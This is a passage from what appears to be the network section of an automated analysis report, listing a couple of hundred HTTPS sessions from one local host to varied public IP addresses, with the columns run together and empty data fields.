                                      12758192.168.2.1456200135.99.200.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12759192.168.2.145893240.10.207.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12760192.168.2.143623689.19.141.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12761192.168.2.145129636.44.195.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12762192.168.2.144039285.44.177.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12763192.168.2.143633258.9.210.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12764192.168.2.1445716217.249.208.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12765192.168.2.1444654175.241.65.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12766192.168.2.1448870189.141.102.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12767192.168.2.1439756141.143.132.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12768192.168.2.146016691.114.72.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12769192.168.2.1457744220.199.85.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12770192.168.2.1435658111.151.37.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12771192.168.2.1444494222.245.229.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12772192.168.2.1454908216.215.83.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12773192.168.2.144377469.250.132.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12774192.168.2.144438670.161.130.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12775192.168.2.1443684108.236.144.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12776192.168.2.1456344130.140.144.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12777192.168.2.1455184105.58.186.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12778192.168.2.1458012180.208.96.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12779192.168.2.1435620146.174.131.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12780192.168.2.1460624139.189.136.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12781192.168.2.1444288135.37.214.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12782192.168.2.145957092.4.12.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12783192.168.2.1452088110.49.160.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12784192.168.2.1440468170.181.232.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12785192.168.2.143777420.37.88.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12786192.168.2.14449361.65.108.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12787192.168.2.143569450.117.108.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12788192.168.2.145479673.246.204.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12789192.168.2.1453928194.192.13.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12790192.168.2.1443280223.175.212.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12791192.168.2.1437480134.76.15.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12792192.168.2.1451542170.240.250.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12793192.168.2.145558848.93.222.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12794192.168.2.145692468.243.48.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12795192.168.2.1451476149.222.242.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12796192.168.2.1438778126.249.62.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12797192.168.2.1439754128.89.78.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12798192.168.2.145275470.20.3.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12799192.168.2.1459268196.5.222.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12800192.168.2.1454322109.105.129.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12801192.168.2.1444714178.207.170.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12802192.168.2.1451736170.183.33.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12803192.168.2.1441086166.13.71.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12804192.168.2.1434230142.109.0.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12805192.168.2.1441272111.116.95.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12806192.168.2.1441364149.47.10.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12807192.168.2.1446952208.187.103.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12808192.168.2.145302680.53.89.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12809192.168.2.1451198116.41.152.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12810192.168.2.143839248.82.165.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12811192.168.2.145595496.164.10.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12812192.168.2.1444084105.250.85.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12813192.168.2.144602253.232.73.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12814192.168.2.145742066.162.166.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12815192.168.2.143973819.43.193.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12816192.168.2.1439084207.132.13.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12817192.168.2.14458264.20.160.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12818192.168.2.1449898213.235.8.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12819192.168.2.1457978149.68.79.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12820192.168.2.144269686.17.101.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12821192.168.2.143989059.245.250.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12822192.168.2.143570281.64.68.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12823192.168.2.1457790216.88.50.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12824192.168.2.145465682.241.153.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12825192.168.2.145131859.32.69.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12826192.168.2.144518278.186.203.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12827192.168.2.143676427.147.17.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12828192.168.2.143859651.193.6.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12829192.168.2.1438254157.149.39.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12830192.168.2.1454886200.60.62.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12831192.168.2.1444390110.188.44.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12832192.168.2.1447884192.85.185.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12833192.168.2.144391088.195.149.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12834192.168.2.1454608133.246.2.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12835192.168.2.1440530134.123.30.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12836192.168.2.1447204195.242.173.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12837192.168.2.1447936220.6.207.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12838192.168.2.14464561.72.167.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12839192.168.2.1439744171.165.74.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12840192.168.2.143627486.101.68.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12841192.168.2.1448284151.79.211.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12842192.168.2.1460480109.119.5.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12843192.168.2.1438918222.54.236.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12844192.168.2.1439692205.25.137.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12845192.168.2.143337224.204.132.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12846192.168.2.1447402184.252.225.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12847192.168.2.1436562115.32.85.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12848192.168.2.1450196205.65.99.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12849192.168.2.144800048.32.5.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12850192.168.2.1450962159.35.214.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12851192.168.2.1437848180.62.105.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12852192.168.2.145220449.119.178.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12853192.168.2.1438046133.69.122.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12854192.168.2.145807854.50.104.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12855192.168.2.144519059.246.214.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12856192.168.2.1437132170.144.235.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12857192.168.2.1458052203.12.120.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12858192.168.2.1442240184.171.9.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12859192.168.2.1449734155.48.189.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12860192.168.2.1451758116.16.202.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12861192.168.2.1460282134.64.102.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12862192.168.2.145644639.253.112.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12863192.168.2.1447746158.111.240.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12864192.168.2.1437948120.76.71.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12865192.168.2.145522693.111.120.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12866192.168.2.144211287.236.157.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12867192.168.2.1458490120.75.77.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12868192.168.2.1449368189.50.53.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12869192.168.2.1436558109.143.126.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12870192.168.2.145612065.99.117.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12871192.168.2.1434674152.33.12.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12872192.168.2.145436019.49.72.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12873192.168.2.143995612.188.177.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12874192.168.2.1441414207.249.67.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12875192.168.2.144266636.16.91.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12876192.168.2.1455578198.87.111.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12877192.168.2.145504080.224.68.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12878192.168.2.1448066183.110.229.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12879192.168.2.143799062.1.206.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12880192.168.2.1438928169.196.42.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12881192.168.2.1457964184.101.58.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12882192.168.2.1442564132.175.75.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12883192.168.2.1448368210.221.77.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12884192.168.2.143637239.200.34.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12885192.168.2.145614835.44.60.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12886192.168.2.1449664181.5.73.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12887192.168.2.1436058217.22.11.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12888192.168.2.143699099.151.159.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12889192.168.2.1445974187.24.241.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12890192.168.2.1443916159.4.220.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12891192.168.2.1453884148.253.67.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12892192.168.2.1454342119.184.72.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12893192.168.2.1455682107.52.53.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12894192.168.2.1439732172.7.144.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12895192.168.2.14394602.10.39.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12896192.168.2.1439740190.226.224.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12897192.168.2.145346238.173.193.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12898192.168.2.1449342207.58.223.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12899192.168.2.1435496186.129.205.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12900192.168.2.1458644199.235.164.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12901192.168.2.143602283.22.126.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12902192.168.2.145486468.77.192.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12903192.168.2.1433578149.46.22.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12904192.168.2.1449652150.135.135.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12905192.168.2.143974473.183.191.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12906192.168.2.1436524175.91.170.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12907192.168.2.1458320174.149.63.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12908192.168.2.1454782223.152.183.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12909192.168.2.1434376159.129.35.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12910192.168.2.1442540114.109.99.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12911192.168.2.143363288.249.248.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12912192.168.2.145119252.153.212.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12913192.168.2.144882818.131.236.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12914192.168.2.144018086.99.116.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12915192.168.2.1439220142.50.81.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12916192.168.2.1454756199.68.112.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12917192.168.2.145518671.6.231.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12918192.168.2.144553269.89.173.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12919192.168.2.145659699.205.176.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12920192.168.2.144630668.32.183.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12921192.168.2.1443276159.46.100.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12922192.168.2.145928841.120.30.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12923192.168.2.1452412163.124.228.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12924192.168.2.1457354208.82.5.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12925192.168.2.1450340108.221.230.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12926192.168.2.1447646197.9.205.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12927192.168.2.145903480.98.82.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12928192.168.2.1436306206.111.185.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12929192.168.2.1435796169.191.234.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12930192.168.2.143710237.210.107.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12931192.168.2.145546848.113.217.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12932192.168.2.145849050.64.69.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12933192.168.2.145827658.48.157.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12934192.168.2.1453282112.156.240.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12935192.168.2.1438866202.30.195.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12936192.168.2.1448294201.1.195.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12937192.168.2.145712231.236.13.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12938192.168.2.1448654198.101.52.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12939192.168.2.1451562174.155.116.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12940192.168.2.1438072169.25.211.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12941192.168.2.1442216221.186.237.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12942192.168.2.1458226192.250.171.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12943192.168.2.143568234.1.58.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12944192.168.2.1433868194.212.196.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12945192.168.2.145123635.79.13.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12946192.168.2.1444060132.224.206.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12947192.168.2.1440170163.101.39.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12948192.168.2.1443522200.76.216.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12949192.168.2.144665025.149.62.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12950192.168.2.1448688197.232.56.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12951192.168.2.14461462.133.120.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12952192.168.2.1441492116.11.197.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12953192.168.2.145777480.224.65.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12954192.168.2.1439360202.118.222.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12955192.168.2.145830057.244.127.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12956192.168.2.1439100156.206.148.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12957192.168.2.1443804142.255.154.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12958192.168.2.1460764125.35.102.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12959192.168.2.146099077.100.151.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12960192.168.2.1458504163.200.127.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12961192.168.2.14408642.184.45.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12962192.168.2.144673451.251.145.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12963192.168.2.1432860110.49.49.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12964192.168.2.143864039.27.10.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12965192.168.2.145364842.35.78.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12966192.168.2.1457134180.48.148.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12967192.168.2.1455026158.15.20.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12968192.168.2.1435992192.136.69.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12969192.168.2.143678073.219.232.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12970192.168.2.1454310137.196.181.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12971192.168.2.1445836104.86.237.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12972192.168.2.143497859.107.93.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12973192.168.2.1460432153.3.179.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12974192.168.2.1438872141.61.9.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12975192.168.2.1454110223.29.71.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12976192.168.2.1438396141.184.26.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12977192.168.2.1455282140.191.217.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12978192.168.2.1445302150.164.218.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12979192.168.2.1453894143.7.47.234443
                                      TimestampBytes transferredDirectionData


